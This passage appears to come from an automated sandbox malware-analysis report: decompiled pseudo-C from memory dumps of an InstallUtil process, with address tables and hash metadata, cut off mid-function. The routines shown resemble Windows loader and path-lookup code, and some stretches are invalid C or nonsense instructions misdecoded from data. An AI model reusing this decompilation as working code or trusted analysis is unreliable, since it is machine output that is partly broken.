                      				signed int _t338;
                      				signed int _t340;
                      				void* _t341;
                      				signed int _t343;
                      				void* _t344;
                      
                      				_t338 = _t340;
                      				_t341 = _t340 - 0x4c;
                      				_v8 =  *0x13bd360 ^ _t338;
                      				_push(__ebx);
                      				_push(__esi);
                      				_push(__edi);
                      				_t333 = 0x13bb2e8;
                      				_v56 = _a4;
                      				_v48 = __edx;
                      				_v60 = __ecx;
                      				_t295 = 0;
                      				_v80 = 0;
                      				asm("movsd");
                      				_v64 = 0;
                      				_v76 = 0;
                      				_v72 = 0;
                      				asm("movsd");
                      				_v44 = 0;
                      				_v52 = 0;
                      				_v68 = 0;
                      				asm("movsd");
                      				_v32 = 0;
                      				_v36 = 0;
                      				asm("movsd");
                      				_v16 = 0;
                      				_t344 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                      				_t285 = 0x48;
                      				_t315 = 0 | _t344 == 0x00000000;
                      				_t326 = 0;
                      				_v37 = _t344 == 0;
                      				if(_v48 <= 0) {
                      					L16:
                      					_t45 = _t285 - 0x48; // 0x0
                      					__eflags = _t45 - 0xfffe;
                      					if(_t45 > 0xfffe) {
                      						_t334 = 0xc0000106;
                      						goto L32;
                      					} else {
                      						_t333 = L012E4620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
                      						_v52 = _t333;
                      						__eflags = _t333;
                      						if(_t333 == 0) {
                      							_t334 = 0xc0000017;
                      							goto L32;
                      						} else {
                      							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
                      							_t50 = _t333 + 0x48; // 0x48
                      							_t328 = _t50;
                      							_t315 = _v32;
                      							 *((intOrPtr*)(_t333 + 0x3c)) = _t285;
                      							_t287 = 0;
                      							 *((short*)(_t333 + 0x30)) = _v48;
                      							__eflags = _t315;
                      							if(_t315 != 0) {
                      								 *(_t333 + 0x18) = _t328;
                      								__eflags = _t315 - 0x13b8478;
                      								 *_t333 = ((0 | _t315 == 0x013b8478) - 0x00000001 & 0xfffffffb) + 7;
                      								E0130F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
                      								_t315 = _v32;
                      								_t341 = _t341 + 0xc;
                      								_t287 = 1;
                      								__eflags = _a8;
                      								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
                      								if(_a8 != 0) {
                      									_t279 = E013539F2(_t328);
                      									_t315 = _v32;
                      									_t328 = _t279;
                      								}
                      							}
                      							_t299 = 0;
                      							_v16 = 0;
                      							__eflags = _v48;
                      							if(_v48 <= 0) {
                      								L31:
                      								_t334 = _v68;
                      								__eflags = 0;
                      								 *((short*)(_t328 - 2)) = 0;
                      								goto L32;
                      							} else {
                      								_t289 = _t333 + _t287 * 4;
                      								_v56 = _t289;
                      								do {
                      									__eflags = _t315;
                      									if(_t315 != 0) {
                      										_t240 =  *(_v60 + _t299 * 4);
                      										__eflags = _t240;
                      										if(_t240 == 0) {
                      											goto L30;
                      										} else {
                      											__eflags = _t240 == 5;
                      											if(_t240 == 5) {
                      												goto L30;
                      											} else {
                      												goto L22;
                      											}
                      										}
                      									} else {
                      										L22:
                      										 *_t289 =  *(_v60 + _t299 * 4);
                      										 *(_t289 + 0x18) = _t328;
                      										_t244 =  *(_v60 + _t299 * 4);
                      										__eflags = _t244 - 8;
                      										if(_t244 > 8) {
                      											goto L56;
                      										} else {
                      											switch( *((intOrPtr*)(_t244 * 4 +  &M012F2959))) {
                      												case 0:
                      													__ax =  *0x13b8488;
                      													__eflags = __ax;
                      													if(__ax == 0) {
                      														goto L29;
                      													} else {
                      														__ax & 0x0000ffff = E0130F3E0(__edi,  *0x13b848c, __ax & 0x0000ffff);
                      														__eax =  *0x13b8488 & 0x0000ffff;
                      														goto L26;
                      													}
                      													goto L108;
                      												case 1:
                      													L45:
                      													E0130F3E0(_t328, _v80, _v64);
                      													_t274 = _v64;
                      													goto L26;
                      												case 2:
                      													 *0x13b8480 & 0x0000ffff = E0130F3E0(__edi,  *0x13b8484,  *0x13b8480 & 0x0000ffff);
                      													__eax =  *0x13b8480 & 0x0000ffff;
                      													__eax = ( *0x13b8480 & 0x0000ffff) >> 1;
                      													__edi = __edi + __eax * 2;
                      													goto L28;
                      												case 3:
                      													__eax = _v44;
                      													__eflags = __eax;
                      													if(__eax == 0) {
                      														goto L29;
                      													} else {
                      														__esi = __eax + __eax;
                      														__eax = E0130F3E0(__edi, _v72, __esi);
                      														__edi = __edi + __esi;
                      														__esi = _v52;
                      														goto L27;
                      													}
                      													goto L108;
                      												case 4:
                      													_push(0x2e);
                      													_pop(__eax);
                      													 *(__esi + 0x44) = __edi;
                      													 *__edi = __ax;
                      													__edi = __edi + 4;
                      													_push(0x3b);
                      													_pop(__eax);
                      													 *(__edi - 2) = __ax;
                      													goto L29;
                      												case 5:
                      													__eflags = _v36;
                      													if(_v36 == 0) {
                      														goto L45;
                      													} else {
                      														E0130F3E0(_t328, _v76, _v36);
                      														_t274 = _v36;
                      													}
                      													L26:
                      													_t341 = _t341 + 0xc;
                      													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
                      													__eflags = _t328;
                      													L27:
                      													_push(0x3b);
                      													_pop(_t276);
                      													 *((short*)(_t328 - 2)) = _t276;
                      													goto L28;
                      												case 6:
                      													__ebx = "\\WWw\\WWw";
                      													__eflags = __ebx - "\\WWw\\WWw";
                      													if(__ebx != "\\WWw\\WWw") {
                      														_push(0x3b);
                      														_pop(__esi);
                      														do {
                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                      															E0130F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                      															__edi = __edi + __eax * 2;
                      															__edi = __edi + 2;
                      															 *(__edi - 2) = __si;
                      															__ebx =  *__ebx;
                      															__eflags = __ebx - "\\WWw\\WWw";
                      														} while (__ebx != "\\WWw\\WWw");
                      														__esi = _v52;
                      														__ecx = _v16;
                      														__edx = _v32;
                      													}
                      													__ebx = _v56;
                      													goto L29;
                      												case 7:
                      													 *0x13b8478 & 0x0000ffff = E0130F3E0(__edi,  *0x13b847c,  *0x13b8478 & 0x0000ffff);
                      													__eax =  *0x13b8478 & 0x0000ffff;
                      													__eax = ( *0x13b8478 & 0x0000ffff) >> 1;
                      													__eflags = _a8;
                      													__edi = __edi + __eax * 2;
                      													if(_a8 != 0) {
                      														__ecx = __edi;
                      														__eax = E013539F2(__ecx);
                      														__edi = __eax;
                      													}
                      													goto L28;
                      												case 8:
                      													__eax = 0;
                      													 *(__edi - 2) = __ax;
                      													 *0x13b6e58 & 0x0000ffff = E0130F3E0(__edi,  *0x13b6e5c,  *0x13b6e58 & 0x0000ffff);
                      													 *(__esi + 0x38) = __edi;
                      													__eax =  *0x13b6e58 & 0x0000ffff;
                      													__eax = ( *0x13b6e58 & 0x0000ffff) >> 1;
                      													__edi = __edi + __eax * 2;
                      													__edi = __edi + 2;
                      													L28:
                      													_t299 = _v16;
                      													_t315 = _v32;
                      													L29:
                      													_t289 = _t289 + 4;
                      													__eflags = _t289;
                      													_v56 = _t289;
                      													goto L30;
                      											}
                      										}
                      									}
                      									goto L108;
                      									L30:
                      									_t299 = _t299 + 1;
                      									_v16 = _t299;
                      									__eflags = _t299 - _v48;
                      								} while (_t299 < _v48);
                      								goto L31;
                      							}
                      						}
                      					}
                      				} else {
                      					while(1) {
                      						L1:
                      						_t244 =  *(_v60 + _t326 * 4);
                      						if(_t244 > 8) {
                      							break;
                      						}
                      						switch( *((intOrPtr*)(_t244 * 4 +  &M012F2935))) {
                      							case 0:
                      								__ax =  *0x13b8488;
                      								__eflags = __ax;
                      								if(__ax != 0) {
                      									__eax = __ax & 0x0000ffff;
                      									__ebx = __ebx + 2;
                      									__eflags = __ebx;
                      									goto L53;
                      								}
                      								goto L14;
                      							case 1:
                      								L44:
                      								_t315 =  &_v64;
                      								_v80 = E012F2E3E(0,  &_v64);
                      								_t285 = _t285 + _v64 + 2;
                      								goto L13;
                      							case 2:
                      								__eax =  *0x13b8480 & 0x0000ffff;
                      								__ebx = __ebx + __eax;
                      								__eflags = __dl;
                      								if(__dl != 0) {
                      									__eax = 0x13b8480;
                      									goto L80;
                      								}
                      								goto L14;
                      							case 3:
                      								__eax = E012DEEF0(0x13b79a0);
                      								__eax =  &_v44;
                      								_push(__eax);
                      								_push(0);
                      								_push(0);
                      								_push(4);
                      								_push(L"PATH");
                      								_push(0);
                      								L57();
                      								__esi = __eax;
                      								_v68 = __esi;
                      								__eflags = __esi - 0xc0000023;
                      								if(__esi != 0xc0000023) {
                      									L10:
                      									__eax = E012DEB70(__ecx, 0x13b79a0);
                      									__eflags = __esi - 0xc0000100;
                      									if(__esi == 0xc0000100) {
                      										_v44 = _v44 & 0x00000000;
                      										__eax = 0;
                      										_v68 = 0;
                      										goto L13;
                      									} else {
                      										__eflags = __esi;
                      										if(__esi < 0) {
                      											L32:
                      											_t218 = _v72;
                      											__eflags = _t218;
                      											if(_t218 != 0) {
                      												L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                      											}
                      											_t219 = _v52;
                      											__eflags = _t219;
                      											if(_t219 != 0) {
                      												__eflags = _t334;
                      												if(_t334 < 0) {
                      													L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
                      													_t219 = 0;
                      												}
                      											}
                      											goto L36;
                      										} else {
                      											__eax = _v44;
                      											__ebx = __ebx + __eax * 2;
                      											__ebx = __ebx + 2;
                      											__eflags = __ebx;
                      											L13:
                      											_t295 = _v36;
                      											goto L14;
                      										}
                      									}
                      								} else {
                      									__eax = _v44;
                      									__ecx =  *0x13b7b9c; // 0x0
                      									_v44 + _v44 =  *[fs:0x30];
                      									__ecx = __ecx + 0x180000;
                      									__eax = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                      									_v72 = __eax;
                      									__eflags = __eax;
                      									if(__eax == 0) {
                      										__eax = E012DEB70(__ecx, 0x13b79a0);
                      										__eax = _v52;
                      										L36:
                      										_pop(_t327);
                      										_pop(_t335);
                      										__eflags = _v8 ^ _t338;
                      										_pop(_t286);
                      										return E0130B640(_t219, _t286, _v8 ^ _t338, _t315, _t327, _t335);
                      									} else {
                      										__ecx =  &_v44;
                      										_push(__ecx);
                      										_push(_v44);
                      										_push(__eax);
                      										_push(4);
                      										_push(L"PATH");
                      										_push(0);
                      										L57();
                      										__esi = __eax;
                      										_v68 = __eax;
                      										goto L10;
                      									}
                      								}
                      								goto L108;
                      							case 4:
                      								__ebx = __ebx + 4;
                      								goto L14;
                      							case 5:
                      								_t281 = _v56;
                      								if(_v56 != 0) {
                      									_t315 =  &_v36;
                      									_t283 = E012F2E3E(_t281,  &_v36);
                      									_t295 = _v36;
                      									_v76 = _t283;
                      								}
                      								if(_t295 == 0) {
                      									goto L44;
                      								} else {
                      									_t285 = _t285 + 2 + _t295;
                      								}
                      								goto L14;
                      							case 6:
                      								__eax =  *0x13b5764 & 0x0000ffff;
                      								goto L53;
                      							case 7:
                      								__eax =  *0x13b8478 & 0x0000ffff;
                      								__ebx = __ebx + __eax;
                      								__eflags = _a8;
                      								if(_a8 != 0) {
                      									__ebx = __ebx + 0x16;
                      									__ebx = __ebx + __eax;
                      								}
                      								__eflags = __dl;
                      								if(__dl != 0) {
                      									__eax = 0x13b8478;
                      									L80:
                      									_v32 = __eax;
                      								}
                      								goto L14;
                      							case 8:
                      								__eax =  *0x13b6e58 & 0x0000ffff;
                      								__eax = ( *0x13b6e58 & 0x0000ffff) + 2;
                      								L53:
                      								__ebx = __ebx + __eax;
                      								L14:
                      								_t326 = _t326 + 1;
                      								if(_t326 >= _v48) {
                      									goto L16;
                      								} else {
                      									_t315 = _v37;
                      									goto L1;
                      								}
                      								goto L108;
                      						}
                      					}
                      					L56:
                      					_t300 = 0x25;
                      					asm("int 0x29");
                      					asm("out 0x28, al");
                      					asm("das");
                      					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t341;
                      					asm("das");
                      					_t245 = _t244 + _t341;
                      					asm("daa");
                      					asm("das");
                      					 *_t333 =  *_t333 + _t338;
                      					asm("das");
                      					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t245;
                      					asm("das");
                      					 *0x1f012f26 =  *0x1f012f26 + _t245;
                      					_pop(_t290);
                      					_t247 = _t341;
                      					_t343 = _t245 ^  *_t300;
                      					 *_t328 =  *_t328 - _t300;
                      					 *0x201335b =  *0x201335b + _t333;
                      					 *_t328 =  *_t328 - _t338;
                      					 *((intOrPtr*)(_t247 - 0x9fed0d8)) =  *((intOrPtr*)(_t341 - 0x9fed0d8)) + _t341;
                      					asm("daa");
                      					asm("das");
                      					 *_t333 =  *_t333 + _t290;
                      					 *_t328 =  *_t328 - _t300;
                      					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t300;
                      					asm("das");
                      					_a35 = _a35 + _t290;
                      					asm("das");
                      					_pop(_t291);
                      					asm("das");
                      					 *((intOrPtr*)(_t343 + _t291 * 2)) =  *((intOrPtr*)(_t343 + _t291 * 2)) + _t333;
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					asm("int3");
                      					_push(0x20);
                      					_push(0x139ff00);
                      					E0131D08C(_t291, _t328, _t333);
                      					_v44 =  *[fs:0x18];
                      					_t329 = 0;
                      					 *_a24 = 0;
                      					_t292 = _a12;
                      					__eflags = _t292;
                      					if(_t292 == 0) {
                      						_t254 = 0xc0000100;
                      					} else {
                      						_v8 = 0;
                      						_t336 = 0xc0000100;
                      						_v52 = 0xc0000100;
                      						_t256 = 4;
                      						while(1) {
                      							_v40 = _t256;
                      							__eflags = _t256;
                      							if(_t256 == 0) {
                      								break;
                      							}
                      							_t305 = _t256 * 0xc;
                      							_v48 = _t305;
                      							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x12a1664));
                      							if(__eflags <= 0) {
                      								if(__eflags == 0) {
                      									_t271 = E0130E5C0(_a8,  *((intOrPtr*)(_t305 + 0x12a1668)), _t292);
                      									_t343 = _t343 + 0xc;
                      									__eflags = _t271;
                      									if(__eflags == 0) {
                      										_t336 = E013451BE(_t292,  *((intOrPtr*)(_v48 + 0x12a166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
                      										_v52 = _t336;
                      										break;
                      									} else {
                      										_t256 = _v40;
                      										goto L62;
                      									}
                      									goto L70;
                      								} else {
                      									L62:
                      									_t256 = _t256 - 1;
                      									continue;
                      								}
                      							}
                      							break;
                      						}
                      						_v32 = _t336;
                      						__eflags = _t336;
                      						if(_t336 < 0) {
                      							__eflags = _t336 - 0xc0000100;
                      							if(_t336 == 0xc0000100) {
                      								_t301 = _a4;
                      								__eflags = _t301;
                      								if(_t301 != 0) {
                      									_v36 = _t301;
                      									__eflags =  *_t301 - _t329;
                      									if( *_t301 == _t329) {
                      										_t336 = 0xc0000100;
                      										goto L76;
                      									} else {
                      										_t317 =  *((intOrPtr*)(_v44 + 0x30));
                      										_t258 =  *((intOrPtr*)(_t317 + 0x10));
                      										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
                      										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
                      											__eflags =  *(_t317 + 0x1c);
                      											if( *(_t317 + 0x1c) == 0) {
                      												L106:
                      												_t336 = E012F2AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
                      												_v32 = _t336;
                      												__eflags = _t336 - 0xc0000100;
                      												if(_t336 != 0xc0000100) {
                      													goto L69;
                      												} else {
                      													_t329 = 1;
                      													_t301 = _v36;
                      													goto L75;
                      												}
                      											} else {
                      												_t261 = E012D6600( *(_t317 + 0x1c));
                      												__eflags = _t261;
                      												if(_t261 != 0) {
                      													goto L106;
                      												} else {
                      													_t301 = _a4;
                      													goto L75;
                      												}
                      											}
                      										} else {
                      											L75:
                      											_t336 = E012F2C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
                      											L76:
                      											_v32 = _t336;
                      											goto L69;
                      										}
                      									}
                      									goto L108;
                      								} else {
                      									E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                      									_v8 = 1;
                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                      									_t336 = _a24;
                      									_t268 = E012F2AE4( &_v36, _a8, _t292, _a16, _a20, _t336);
                      									_v32 = _t268;
                      									__eflags = _t268 - 0xc0000100;
                      									if(_t268 == 0xc0000100) {
                      										_v32 = E012F2C50(_v36, _a8, _t292, _a16, _a20, _t336, 1);
                      									}
                      									_v8 = _t329;
                      									E012F2ACB();
                      								}
                      							}
                      						}
                      						L69:
                      						_v8 = 0xfffffffe;
                      						_t254 = _t336;
                      					}
                      					L70:
                      					return E0131D0D1(_t254);
                      				}
                      				L108:
                      			}
                      0x012f27d4
                      0x012f27dd
                      0x012f2687
                      0x012f2687
                      0x012f268a
                      0x012f268b
                      0x012f268e
                      0x012f268f
                      0x012f2691
                      0x012f2696
                      0x012f2698
                      0x012f269d
                      0x012f269f
                      0x00000000
                      0x012f269f
                      0x012f2681
                      0x00000000
                      0x00000000
                      0x012f2846
                      0x00000000
                      0x00000000
                      0x012f2605
                      0x012f260a
                      0x012f260c
                      0x012f2611
                      0x012f2616
                      0x012f2619
                      0x012f2619
                      0x012f261e
                      0x00000000
                      0x012f2624
                      0x012f2627
                      0x012f2627
                      0x00000000
                      0x00000000
                      0x01335b1f
                      0x00000000
                      0x00000000
                      0x012f2894
                      0x012f289b
                      0x012f289d
                      0x012f28a1
                      0x01335b2b
                      0x01335b2e
                      0x01335b2e
                      0x012f28a7
                      0x012f28a9
                      0x01335b04
                      0x01335b09
                      0x01335b09
                      0x01335b09
                      0x00000000
                      0x00000000
                      0x01335b35
                      0x01335b3c
                      0x012f28fb
                      0x012f28fb
                      0x012f26cc
                      0x012f26cc
                      0x012f26d0
                      0x00000000
                      0x012f26d2
                      0x012f26d2
                      0x00000000
                      0x012f26d2
                      0x00000000
                      0x00000000
                      0x012f25fe
                      0x012f292d
                      0x012f292f
                      0x012f2930
                      0x012f2935
                      0x012f2937
                      0x012f2938
                      0x012f293b
                      0x012f293c
                      0x012f293e
                      0x012f293f
                      0x012f2940
                      0x012f2942
                      0x012f2944
                      0x012f2947
                      0x012f2948
                      0x012f294e
                      0x012f2951
                      0x012f2951
                      0x012f2952
                      0x012f2954
                      0x012f295a
                      0x012f295c
                      0x012f2962
                      0x012f2963
                      0x012f2964
                      0x012f2966
                      0x012f2968
                      0x012f296b
                      0x012f296c
                      0x012f296f
                      0x012f2972
                      0x012f2977
                      0x012f2978
                      0x012f297d
                      0x012f297e
                      0x012f297f
                      0x012f2980
                      0x012f2981
                      0x012f2982
                      0x012f2983
                      0x012f2984
                      0x012f2985
                      0x012f2986
                      0x012f2987
                      0x012f2988
                      0x012f2989
                      0x012f298a
                      0x012f298b
                      0x012f298c
                      0x012f298d
                      0x012f298e
                      0x012f298f
                      0x012f2990
                      0x012f2992
                      0x012f2997
                      0x012f29a3
                      0x012f29a6
                      0x012f29ab
                      0x012f29ad
                      0x012f29b0
                      0x012f29b2
                      0x01335c80
                      0x012f29b8
                      0x012f29b8
                      0x012f29bb
                      0x012f29c0
                      0x012f29c5
                      0x012f29c6
                      0x012f29c6
                      0x012f29c9
                      0x012f29cb
                      0x00000000
                      0x00000000
                      0x012f29cd
                      0x012f29d0
                      0x012f29d9
                      0x012f29db
                      0x012f29dd
                      0x012f2a7f
                      0x012f2a84
                      0x012f2a87
                      0x012f2a89
                      0x01335ca1
                      0x01335ca3
                      0x00000000
                      0x012f2a8f
                      0x012f2a8f
                      0x00000000
                      0x012f2a8f
                      0x00000000
                      0x012f29e3
                      0x012f29e3
                      0x012f29e3
                      0x00000000
                      0x012f29e3
                      0x012f29dd
                      0x00000000
                      0x012f29db
                      0x012f29e6
                      0x012f29e9
                      0x012f29eb
                      0x012f29ed
                      0x012f29f3
                      0x012f29f5
                      0x012f29f8
                      0x012f29fa
                      0x012f2a97
                      0x012f2a9a
                      0x012f2a9d
                      0x012f2add
                      0x00000000
                      0x012f2a9f
                      0x012f2aa2
                      0x012f2aa5
                      0x012f2aa8
                      0x012f2aab
                      0x01335cab
                      0x01335caf
                      0x01335cc5
                      0x01335cda
                      0x01335cdc
                      0x01335cdf
                      0x01335ce5
                      0x00000000
                      0x01335ceb
                      0x01335ced
                      0x01335cee
                      0x00000000
                      0x01335cee
                      0x01335cb1
                      0x01335cb4
                      0x01335cb9
                      0x01335cbb
                      0x00000000
                      0x01335cbd
                      0x01335cbd
                      0x00000000
                      0x01335cbd
                      0x01335cbb
                      0x012f2ab1
                      0x012f2ab1
                      0x012f2ac4
                      0x012f2ac6
                      0x012f2ac6
                      0x00000000
                      0x012f2ac6
                      0x012f2aab
                      0x00000000
                      0x012f2a00
                      0x012f2a09
                      0x012f2a0e
                      0x012f2a21
                      0x012f2a24
                      0x012f2a35
                      0x012f2a3a
                      0x012f2a3d
                      0x012f2a42
                      0x012f2a59
                      0x012f2a59
                      0x012f2a5c
                      0x012f2a5f
                      0x012f2a5f
                      0x012f29fa
                      0x012f29f3
                      0x012f2a64
                      0x012f2a64
                      0x012f2a6b
                      0x012f2a6b
                      0x012f2a6d
                      0x012f2a72
                      0x012f2a72
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID: PATH
                      • API String ID: 0-1036084923
                      • Opcode ID: 8494966255c402124fd99c7a6650475fa05133fbb1780de0e7569a3141e2c3b5
                      • Instruction ID: f4de659b8e6f6f4b396801b92a7b9c9ddad8146dd7b3ed4638e76acce77c2948
                      • Opcode Fuzzy Hash: 8494966255c402124fd99c7a6650475fa05133fbb1780de0e7569a3141e2c3b5
                      • Instruction Fuzzy Hash: D5C18E71D2020ADBDB29DF99D881AAEFBB4FF49714F14402DE601AB290E774E841CB60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 42%
                      			E012CC962(intOrPtr __ecx) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t19;
                      				intOrPtr _t22;
                      				void* _t26;
                      				void* _t27;
                      				void* _t32;
                      				intOrPtr _t34;
                      				void* _t35;
                      				void* _t37;
                      				intOrPtr* _t38;
                      				signed int _t39;
                      
                      				_t41 = (_t39 & 0xfffffff8) - 0xc;
                      				_v8 =  *0x13bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                      				_t34 = __ecx;
                      				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                      					_t26 = 0;
                      					E012DEEF0(0x13b70a0);
                      					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                      					if(E0134F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                      						L9:
                      						E012DEB70(_t29, 0x13b70a0);
                      						_t19 = _t26;
                      						L2:
                      						_pop(_t35);
                      						_pop(_t37);
                      						_pop(_t27);
                      						return E0130B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                      					}
                      					_t29 = _t34;
                      					_t26 = E0134F1FC(_t34, _t32);
                      					if(_t26 < 0) {
                      						goto L9;
                      					}
                      					_t38 =  *0x13b70c0; // 0x0
                      					while(_t38 != 0x13b70c0) {
                      						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                      						_t38 =  *_t38;
                      						_v12 = _t22;
                      						if(_t22 != 0) {
                      							_t29 = _t22;
                      							 *0x13bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                      							_v12();
                      						}
                      					}
                      					goto L9;
                      				}
                      				_t19 = 0;
                      				goto L2;
                      			}

                      Memory Dump Source
                      • Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true
                      • Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmp
                      • Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e078f4a680ae2d0d6ed6553e1fe393d302df2a7cea93369c5503aa9099a8c965
                      • Instruction ID: 953a121b8ce9631ee6c2de0e02270802e6e69e358f413528d829e20c3eedac63
                      • Opcode Fuzzy Hash: e078f4a680ae2d0d6ed6553e1fe393d302df2a7cea93369c5503aa9099a8c965
                      • Instruction Fuzzy Hash: 7C11A5713106469BCB11AF3DDC8596BB7E9FBC4618F000539EA4587A91EB20EC15D7D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 63%
                      			E012C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                      				signed char _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				signed int _v52;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr _t55;
                      				signed int _t57;
                      				signed int _t58;
                      				char* _t62;
                      				signed char* _t63;
                      				signed char* _t64;
                      				signed int _t67;
                      				signed int _t72;
                      				signed int _t77;
                      				signed int _t78;
                      				signed int _t88;
                      				intOrPtr _t89;
                      				signed char _t93;
                      				signed int _t97;
                      				signed int _t98;
                      				signed int _t102;
                      				signed int _t103;
                      				intOrPtr _t104;
                      				signed int _t105;
                      				signed int _t106;
                      				signed char _t109;
                      				signed int _t111;
                      				void* _t116;
                      
                      				_t102 = __edi;
                      				_t97 = __edx;
                      				_v12 = _v12 & 0x00000000;
                      				_t55 =  *[fs:0x18];
                      				_t109 = __ecx;
                      				_v8 = __edx;
                      				_t86 = 0;
                      				_v32 = _t55;
                      				_v24 = 0;
                      				_push(__edi);
                      				if(__ecx == 0x13b5350) {
                      					_t86 = 1;
                      					_v24 = 1;
                      					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                      				}
                      				_t103 = _t102 | 0xffffffff;
                      				if( *0x13b7bc8 != 0) {
                      					_push(0xc000004b);
                      					_push(_t103);
                      					E013097C0();
                      				}
                      				if( *0x13b79c4 != 0) {
                      					_t57 = 0;
                      				} else {
                      					_t57 = 0x13b79c8;
                      				}
                      				_v16 = _t57;
                      				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                      					_t93 = _t109;
                      					L23();
                      				}
                      				_t58 =  *_t109;
                      				if(_t58 == _t103) {
                      					__eflags =  *(_t109 + 0x14) & 0x01000000;
                      					_t58 = _t103;
                      					if(__eflags == 0) {
                      						_t93 = _t109;
                      						E012F1624(_t86, __eflags);
                      						_t58 =  *_t109;
                      					}
                      				}
                      				_v20 = _v20 & 0x00000000;
                      				if(_t58 != _t103) {
                      					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                      				}
                      				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                      				_t88 = _v16;
                      				_v28 = _t104;
                      				L9:
                      				while(1) {
                      					if(E012E7D50() != 0) {
                      						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                      					} else {
                      						_t62 = 0x7ffe0382;
                      					}
                      					if( *_t62 != 0) {
                      						_t63 =  *[fs:0x30];
                      						__eflags = _t63[0x240] & 0x00000002;
                      						if((_t63[0x240] & 0x00000002) != 0) {
                      							_t93 = _t109;
                      							E0135FE87(_t93);
                      						}
                      					}
                      					if(_t104 != 0xffffffff) {
                      						_push(_t88);
                      						_push(0);
                      						_push(_t104);
                      						_t64 = E01309520();
                      						goto L15;
                      					} else {
                      						while(1) {
                      							_t97 =  &_v8;
                      							_t64 = E012FE18B(_t109 + 4, _t97, 4, _t88, 0);
                      							if(_t64 == 0x102) {
                      								break;
                      							}
                      							_t93 =  *(_t109 + 4);
                      							_v8 = _t93;
                      							if((_t93 & 0x00000002) != 0) {
                      								continue;
                      							}
                      							L15:
                      							if(_t64 == 0x102) {
                      								break;
                      							}
                      							_t89 = _v24;
                      							if(_t64 < 0) {
                      								E0131DF30(_t93, _t97, _t64);
                      								_push(_t93);
                      								_t98 = _t97 | 0xffffffff;
                      								__eflags =  *0x13b6901;
                      								_push(_t109);
                      								_v52 = _t98;
                      								if( *0x13b6901 != 0) {
                      									_push(0);
                      									_push(1);
                      									_push(0);
                      									_push(0x100003);
                      									_push( &_v12);
                      									_t72 = E01309980();
                      									__eflags = _t72;
                      									if(_t72 < 0) {
                      										_v12 = _t98 | 0xffffffff;
                      									}
                      								}
                      								asm("lock cmpxchg [ecx], edx");
                      								_t111 = 0;
                      								__eflags = 0;
                      								if(0 != 0) {
